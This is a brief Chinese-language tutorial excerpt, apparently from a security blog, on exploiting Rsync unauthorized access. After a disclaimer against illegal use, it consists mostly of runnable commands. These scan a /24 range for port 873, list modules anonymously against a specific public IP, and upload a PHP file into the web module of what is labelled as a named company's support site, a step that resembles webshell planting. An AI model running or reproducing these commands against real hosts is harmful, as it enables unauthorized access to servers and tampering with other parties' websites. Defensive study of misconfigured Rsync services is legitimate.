注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。
[TOC]
Rsync 未授权访问漏洞
描述: 安全之默认密码登陆之Rsync未授权访问。
- 1.rsync默认的端口是873,可以使用nmap扫描IP是否开放该端口,当找到开放端口后,查看时候可默认口令登陆,使用命令查看:
1
2
3
4
5
6
7
8# 扫描
nmap -n --open -p 873 x.x.x.x/24
# 验证
rsync ip::
# 显示二级文件
rsync -av 115.29.246.254::
2.既然是同步文件,自然有选择查看、上传或者下载的能力需视权限设定1
2# 同步数据到本地
rsync -vzrtopg --progress ./sxx.php 172.17.16.24::www/support.meitu.com
